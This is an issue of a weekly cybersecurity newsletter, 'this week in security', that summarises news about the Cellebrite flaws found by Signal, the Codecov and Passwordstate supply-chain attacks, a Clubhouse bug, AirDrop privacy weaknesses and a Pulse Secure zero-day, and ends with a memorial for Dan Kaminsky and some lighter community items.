this week in security — april 25 edition
|MC_PREVIEW_TEXT|
~this week in security~ a cybersecurity newsletter by @zackwhittaker (https://twitter.com/zackwhittaker)
volume 4, issue 17 View this email in your browser (|ARCHIVE|)
~ ~
** THIS WEEK, TL;DR
Signal CEO finds security flaws in Cellebrite UFED hardware (https://signal.org/blog/cellebrite-vulnerabilities/) Signal: A few weeks ago, phone forensics company Cellebrite claimed it ‘cracked’ Signal and could extract encrypted messages from an unlocked(!) Android device. Signal’s end-to-end encryption had not been broken, despite some breathless headlines suggesting otherwise. Now, the tables have turned. This week @moxie (https://twitter.com/moxie/status/1384908290115739649) said he acquired a Cellebrite UFED device that he saw “fall off a truck” (was it a turnip truck?), and found several security vulnerabilities in the device’s code that can be triggered via an app on the phone under inspection. It was an incredible troll — one that was extremely well-thought out — because it shows the significant repercussions (https://twitter.com/Riana_Crypto/status/1384936758484348928) on the integrity of the data that Cellebrite devices collect (ie. police evidence). Turns out even police are starting to notice (https://www.forbes.com/sites/thomasbrewster/2021/04/22/cops-iphone-hacking-tools-are-sometimes-insecure-and-buggy/) how buggy this equipment can sometimes be. @meganmcgraham (https://twitter.com/meganmcgraham/status/1385328535695355907?s=20) has a really good thread on why this matters. More: Motherboard (https://www.vice.com/en/article/k78q5y/signal-ceo-hacks-cellebrite-iphone-hacking-device-used-by-cops) | @Forbes (https://www.forbes.com/sites/thomasbrewster/2021/04/22/cops-iphone-hacking-tools-are-sometimes-insecure-and-buggy/?sh=49ee9b61287f) | Ars Technica (https://arstechnica.com/information-technology/2021/04/in-epic-hack-signal-developer-turns-the-tables-on-forensics-firm-cellebrite/) | @riana_crypto (https://twitter.com/Riana_Crypto/status/1384936758484348928) https://twitter.com/selenalarson/status/1382677625139781633?s=20 Codecov hackers breached hundreds of restricted customer sites (https://www.reuters.com/technology/codecov-hackers-breached-hundreds-restricted-customer-sites-sources-2021-04-19/) Reuters: Malicious attackers who tampered with Codecov’s software development tools gained “restricted access to hundreds” of its customers’ networks, according to sources speaking to Reuters. The company’s tool helps find vulnerabilities or bugs in source code during the software development process. Investigators say attackers tampered with the Bash Uploader script, allowing the attackers to siphon passwords and credentials used in the software development process, such as AWS keys. Some 29,000 enterprise clients could be affected by the attack, starting on January 31. HashiCorp has already confirmed (https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/) it is affected. But it’s still early to know just how far this attack reaches. More: Codecov (https://about.codecov.io/security-update/) | Ars Technica (https://arstechnica.com/gadgets/2021/04/backdoored-developer-tool-that-stole-credentials-escaped-notice-for-3-months/)
Facebook downplays breach in internal email as another set of data leaks (https://www.bbc.com/news/technology-56815478) BBC News: Facebook accidentally leaked an email to a reporter describing the mass scraping of Facebook users’ phone numbers as a normal occurrence. Except, it’s not and that’s just Facebook desperately trying to spin. News of the embarrassing self-own landed in the same week as yet another tool was discovered to link email addresses to Facebook accounts, per Motherboard (https://www.vice.com/en/article/bvz8pz/tool-finds-facebook-email-addresses) . More: @ashk4n (https://twitter.com/ashk4n/status/1384567455377285122)
Backdoored password manager stole data from as many as 29,000 enterprises (https://arstechnica.com/gadgets/2021/04/hackers-backdoor-corporate-password-manager-and-steal-customer-data/) Ars Technica: Another supply chain attack was discovered this week after Passwordstate, an enterprise password manager made by Click Studios and used by 29,000 enterprise customers (including governments), was hacked through a malicious update. The malicious code pulls in a second payload, which steals passwords from the user’s vault and uploads it to the attacker’s servers. News of the attack came by way of CSIS Group (https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/) , which said it found the malicious update as part of an investigation. Click Studios hasn’t made any public remarks yet, but warned customers by email to reset ‘all’ passwords stored in Passwordstate. More: CSIS Group (https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/) | The Record (https://therecord.media/password-manager-passwordstate-hacked-to-deploy-malware-on-customer-systems/) | VirusTotal (https://www.virustotal.com/gui/file/1ee0f14c44058e3d0d1c19b4713d573c81b49c28ed58bd41c72832c78f7d1464/detection)
A Clubhouse bug let people lurk in rooms invisibly (https://www.wired.com/story/clubhouse-bug-lurkers-ghost/) Wired ($): A bug in audio-only app Clubhouse allowed users to invisibly stay in rooms, making it impossible to remove them. “I’m going to keep talking to you, but I’m going to disappear,” said @k8em0 (https://twitter.com/k8em0/status/1384962770857234435?s=20) , who found the bug earlier this year. When she disappeared, she told Wired: “That’s the bug. I am a f**king ghost.” This was a great find but Clubhouse was less than responsive to the bug. The bug — two, in fact — were fixed, and the bug bounty was donated to @PayEquityNow (https://twitter.com/PayEquityNow) . Here are a few more technical details (https://www.lutasecurity.com/post/new-clubhouse-security-vulnerabilities-could-happen-to-any-growing-unicorn) about how it worked. More: Luta Security (https://www.lutasecurity.com/post/new-clubhouse-security-vulnerabilities-could-happen-to-any-growing-unicorn) | @k8emo (https://twitter.com/k8em0/status/1384962770857234435?s=20) ~ ~ SUPPORT THIS NEWSLETTER
Thank you to everyone who reads or subscribes to this newsletter! If you can, please spare $1/month (or more for perks! (https://www.patreon.com/posts/mugs-are-on-way-32666051) ), to help cover the server and email costs. You can contribute to the Patreon (https://www.patreon.com/thisweekinsecurity) , or send a one-time donation via PayPal (http://paypal.me/thisweekinsecurity) or Venmo (https://mcusercontent.com/e1ad6038c994abec17dafb116/images/9686ed69-9c8a-4787-9b13-758569be85e4.png) . ~ ~
** THE STUFF YOU MIGHT’VE MISSED
Geico admits fraudsters stole customers’ driver’s license numbers for months (https://techcrunch.com/2021/04/19/geico-driver-license-numbers-scraped/) TechCrunch: Fraudsters used Geico’s online sales site to match hundreds of thousands of customers’ data with their driver’s license numbers as part of an apparent scam to claim fraudulent unemployment benefits. Earlier in the year, Metromile admitted (https://techcrunch.com/2021/02/02/metromile-website-bug-hacker/) a similar security lapse. (Disclosure: I wrote this story.)
U.S. Postal Service is running social media monitoring program (https://news.yahoo.com/the-postal-service-is-running-a-running-a-covert-operations-program-that-monitors-americans-social-media-posts-160022919.html) Yahoo News: The U.S. Postal Service’s law enforcement arm has a “covert operations program” that monitors the social media posts of millions of Americans, including “inflammatory” posts. Several federal government departments — and the military — have been monitoring social media posts for years (https://www.brennancenter.org/our-work/analysis-opinion/government-expanding-its-social-media-surveillance-capabilities) — but experts are stumped as to why the USPS is running this program. The program appears to “root out misuse of the postal system by online actors,” but it’s “not at all clear why their mandate would include monitoring of social media that’s unrelated to use of the postal system.” Precisely.
University of Minnesota accused of submitting buggy patches for research (https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah.com/) Greg Kroah-Hartman: This one’s a bit messy. In a mailing list post, @gregkh (https://twitter.com/gregkh/status/1384785747874656257) , a key Linux kernel developer, banned future contributions from the University of Minnesota after accusing its academics of submitting buggy patches to the Linux kernel. The academics released a paper earlier this year describing how it’s possible to introduce bugs without the maintainer’s knowledge. (This isn’t a new concept.) Kroah-Hartman said the community doesn’t appreciate “being experimented on.” The university later apologized (https://twitter.com/umncomputersci/status/1384948683821694976?s=21) . Here’s a good explainer (https://www.labbott.name/blog/2021/04/21/breakingtrust.html) on the situation by @openlabbott (https://twitter.com/openlabbott) .
Lea Kissner joins Twitter’s security and privacy team (https://twitter.com/LeaKissner/status/1384539395005448201) Lea Kissner: Congrats to @LeaKissner (https://twitter.com/LeaKissner/status/1384539395005448201) who has joined Twitter as its head of privacy engineering. In a tweet, Kissner said they “very much like and use Twitter, so I also have some real personal interest in making it the most respectful product, system, and platform around, all the way from the humans to the hardware.” Kissner is the latest high-profile cyber/privacy hire in the past year, after hiring @rinkisethi (https://twitter.com/rinkisethi) and @dotmudge (https://twitter.com/dotmudge) .
Privacy weaknesses in Apple AirDrop can leak contact details (https://www.theregister.com/2021/04/22/airdrop_contact_leaks/) The Register: Smart research from German academics, who found privacy weaknesses in Apple’s wireless file sharing protocol, AirDrop, which exposes the user’s contact information. “When an AirDrop connection is attempted between a sender and a receiver, the sender transmits over the air a message containing a hash, or digital fingerprint, of its user’s email address or phone number as part of an authentication handshake. In response, if the sender is recognized, the receiver transmits back its hash.” The problem is — you guessed it — the hashing algorithm is old, and possible to unscramble the hashed value “in milliseconds.” ~ ~
** OTHER NEWSY NUGGETS
China-linked hackers used VPN flaw to target U.S. defense industry (https://www.reuters.com/technology/china-linked-hackers-used-pulse-secure-flaw-target-us-defense-industry-2021-04-20/) Security researchers say malicious actors, based in China, have spent months using a zero-day flaw in Pulse Secure VPNs. FireEye didn’t name the targets, but said it included “defense, government, and financial organizations around the world.” Pulse Secure has an advisory (https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/) out for the 10/10 bug with some mitigations. But organizations are hot out of luck for a fix — no patches until May. Just today @lilyhnewman (https://twitter.com/lilyhnewman) had a great story (https://www.wired.com/story/vpn-hacks-pulse-secure-espionage/) out on the minefield of VPN hacks. https://twitter.com/HackingLZ/status/1384636573694808065 Wyden introduces bipartisan bill to end Fourth Amendment loopholes (https://www.wyden.senate.gov/news/press-releases/wyden-paul-and-bipartisan-members-of-congress-introduce-the-fourth-amendment-is-not-for-sale-act-) Sen. @RonWyden (https://twitter.com/RonWyden/status/1384884450014777348) has a new bill with an impressive amount of bicameral and bipartisan support. The Fourth Amendment Is Not For Sale Act aims to close loopholes that allow data brokers to sell Americans’ personal information, including location data, to law enforcement without a warrant. @josephfcox (https://twitter.com/josephfcox/status/1384869828142542849) explains how the bill works (https://www.vice.com/en/article/k78qyy/fourth-amendment-is-not-for-sale-act-would-ban-clearview-and-warrantless-location-data-purchases) and what it’s meant to accomplish.
Ransomware targeted by new Justice Department task force (https://www.wsj.com/articles/ransomware-targeted-by-new-justice-department-task-force-11619014158) The DOJ has formed a task force in an effort to combat ransomware attacks by making these popular extortion schemes less lucrative by targeting the entire digital ecosystem that supports them, per the Wall Street Journal ($).
Stanford student finds glitch in ransomware payment system to save victims $27,000 (https://www.cyberscoop.com/jack-cable-qlocker-ransomware-recovery/) Stanford student @jackhcable (https://twitter.com/jackhcable/status/1385270994554687491?s=21) found a bug in the QLocker ransomware that helped dozens of victims save $27,000 in would-be ransom payments. The glitch has been fixed. But Cable said cybercriminals looking to make a quick buck are “unlikely to have a robust security team.” ~ ~
** IN MEMORIAM
This week we lost security veteran Dan Kaminsky. He was 42. @marcwrogers (https://twitter.com/marcwrogers/status/1385961838735597572) confirmed the news on Saturday. Kaminsky was one of a kind, and beloved across the security community. There have been countless tributes on Twitter (http://(@dakami) since:2021-04-24) and Hacker News (https://news.ycombinator.com/item?id=26925044) from those who have known him over the years, many referencing his tweets (https://twitter.com/dakami/status/1214041947406393349) from last January, reflecting on lessons learned from his work and career. You will be missed, Dan. Thanks for everything. May your memory be a blessing. https://twitter.com/dakami/status/1214041947406393349 ~ ~
** THE HAPPY CORNER
This week, a long overdue wave of blue checks flooded infosec Twitter. Blue checks are about recognizing the important and valuable work from trusted and highly respected infosec folk. Congratulations to all who received one this week! @IanColdwater (https://twitter.com/IanColdwater/status/1384948239003172866) , who was one of those (finally!) verified, has a thread (https://twitter.com/IanColdwater/status/1380320895172968449) on who else got a blue check, and who you should follow!
Next — this tweet (https://twitter.com/AccidentalCISO/status/1384155643502678030) is presented without comment. https://twitter.com/AccidentalCISO/status/1384155643502678030 And congratulations to @marciahofmann (https://twitter.com/marciahofmann/status/1384988026258878464?s=21) , one of the finest and sharpest legal minds in cybersecurity, who this week was granted the 2021-2022 Fulbright Cyber Security Award.
Some personal news. I’m honored, grateful, and unbelievably excited to have been granted a 2021-2022 @FulbrightPrgrm Cyber Security Award.
** CYBER CATS & FRIENDS
Meet Kenny, a shelter rescue, whose human tells me that he is very good in protecting his home. Last month, Kenny detected an intruder and the threat was immediately mitigated. What a good pup. Keep it up, Kenny. A big thanks to @OndrashMachula (https://twitter.com/OndrashMachula) for the submission! Please keep sending in your cyber cats (and their friends)! You can drop them here (mailto:this@weekinsecurity.com?Subject=Cyber%20Cat%20%28%26%20Friends%29%20submission&Body=Please%20include%20a%20JPG%20of%20your%20cyber%20cat%20%28or%20other%20non-feline%20friend%29%2C%20their%20name%2C%20and%20also%20your%20name%20and/or%20Twitter%20handle%20if%20you%20want%20credit.) , and feel free to send updates on previously-submitted friends! ~ ~
** SUGGESTION BOX
That’s all for this week. Hope to see you again next Sunday. In the meantime, you can always drop any feedback you have in the suggestion box (https://docs.google.com/forms/d/e/1FAIpQLSebkpf8z8TvMJoixuSzmrR-CTLcOv_ufF7voso1HZBI_f5zrw/viewform) . Have a good one.
============================================================ |IFNOT:ARCHIVE_PAGE| |LIST:DESCRIPTION|
~this week in security~ does not track email opens or link clicks.
Our mailing address is: |LIST_ADDRESS| |END:IF| You can update your preferences (|UPDATE_PROFILE|) or unsubscribe from this list (|UNSUB|) .